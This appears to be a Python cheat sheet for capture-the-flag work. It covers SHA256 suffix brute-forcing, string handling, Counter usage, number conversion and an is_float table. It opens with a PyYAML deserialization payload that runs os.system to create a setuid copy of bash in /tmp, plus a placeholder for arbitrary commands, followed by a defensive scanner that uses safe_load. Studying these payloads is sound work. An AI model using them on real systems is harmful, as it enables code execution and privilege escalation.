PYTHON
Vulnerability
Load yaml
!!python/object/new:os.system [cp /bin/bash /tmp/bash;chmod u+s /tmp/bash]
!!python/object/new:os.system [<RUN COMMAND IN HERE>]
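Added example (not from the original page): these tags only take effect when the document is parsed by a PyYAML loader that constructs Python objects, such as `yaml.unsafe_load` or `Loader=yaml.Loader`. The sketch below flags such tags in YAML text and parses untrusted input with `yaml.safe_load`, which rejects them; `find_python_tags` and `load_untrusted` are hypothetical helper names and `SAMPLE` is a constructed document.

```python
import re

# PyYAML's Python-specific tags, in shorthand (!!python/...) and verbatim
# (!<tag:yaml.org,2002:python/...>) form.
PYTHON_TAG = re.compile(r"(?:!!|!<tag:yaml\.org,2002:)python/[A-Za-z/]+(?::[\w.]+)?")

# Constructed sample: one benign key plus the placeholder payload from this page.
SAMPLE = (
    "name: nightly-report\n"
    "hook: !!python/object/new:os.system [<RUN COMMAND IN HERE>]\n"
)


def find_python_tags(text):
    """Return (line_number, tag) for each Python object tag found in YAML text.

    Triage aid only: text matching can miss or over-report tags, so the real
    control is the loader choice in load_untrusted().
    """
    return [
        (lineno, match.group(0))
        for lineno, line in enumerate(text.splitlines(), 1)
        for match in PYTHON_TAG.finditer(line)
    ]


def load_untrusted(text):
    """Parse untrusted YAML with the safe loader, which builds plain data only."""
    import yaml  # PyYAML; imported lazily so the scanner works without it

    try:
        return yaml.safe_load(text)
    except yaml.YAMLError as exc:  # includes ConstructorError for unknown tags
        raise ValueError(f"rejected YAML: {exc}") from exc


if __name__ == "__main__":
    print(find_python_tags(SAMPLE))
    try:
        load_untrusted(SAMPLE)
    except ValueError as err:
        print(err)
```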
Technique
Find hex from a specific known SHA value in
SHA256
Using hashlib
import hashlib
import random

h = None
while h is None or h[-5:] != '512bf':
    p = random.randrange(1, 0xffffffffffffffffffffffff)
    h = hashlib.sha256(p.to_bytes(12, 'big')).hexdigest()
print('SHA256(' + hex(p) + ')=' + h)
Using pwntools
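import hashlib
import string
from pwn import *

# Last 5 hex digits of the known SHA256 value
target = '512bf'
# mbruteforce passes each candidate as a str, so encode it before hashing
pwnlib.util.iters.mbruteforce(lambda x: hashlib.sha256(x.encode()).hexdigest()[-5:] == target, string.ascii_lowercase, length=10)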
Read file
# Read and decode hex
output = bytes.fromhex(open("output.txt", "r").read().strip())
Get printable strings
import string
# Uppercase ['A','B',...]
UPPER = list(string.ascii_uppercase)
# Lowercase['a','b',...]
LOWER = list(string.ascii_lowercase)
# All ASCII
ALL = list(string.printable)
Shuffle strings
import random
# random.shuffle works in place, so shuffle a list (a str is immutable)
TEMP = list("abcdefg")
random.shuffle(TEMP)
TEMP = "".join(TEMP)
Counter Library
from collections import Counter, OrderedDict
freq = Counter("abbbccccdd")
# Sorted By Descending Order
sorted(freq.items(), key=lambda i: i[1], reverse=True)
# => Output = [('c', 4), ('b', 3), ('d', 2), ('a', 1)]
Conversion
# Binary to hex
dec_str2 = format(int('0100010000', 2), 'x')
# Left-pad to 4 hex digits; rjust returns a new string
dec_str2 = dec_str2.rjust(4, '0')
print(dec_str2)
String to Float/Int
val                   is_float(val) Note
--------------------  ----------    --------------------------------
""                    False         Blank string
"127"                 True          Passed string
True                  True          Pure sweet Truth
"True"                False         Vile contemptible lie
False                 True          So false it becomes true
"123.456"             True          Decimal
" -127 "              True          Spaces trimmed
"\t\n12\r\n"          True          whitespace ignored
"NaN"                 True          Not a number
"NaNanananaBATMAN"    False         I am Batman
"-iNF"                True          Negative infinity
"123.E4"              True          Exponential notation
".1"                  True          mantissa only
"1,234"               False         Commas gtfo
u'\x30'               True          Unicode is fine.
"NULL"                False         Null is not special
0x3fade               True          Hexadecimal
"6e7777777777777"     True          Shrunk to infinity
"1.797693e+308"       True          This is max value
"infinity"            True          Same as inf
"infinityandBEYOND"   False         Extra characters wreck it
"12.34.56"            False         Only one dot allowed
u'四'                  False         Japanese '4' is not a float.
"#56"                 False         Pound sign
"56%"                 False         Percent of what?
"0E0"                 True          Exponential, move dot 0 places
0**0                  True          0___0 Exponentiation
"-5e-5"               True          Raise to a negative number
"+1e1"                True          Plus is OK with exponent
"+1e1^5"              False         Fancy exponent not interpreted
"+1e1.3"              False         No decimals in exponent
"-+1"                 False         Make up your mind
"(1)"                 False         Parenthesis is bad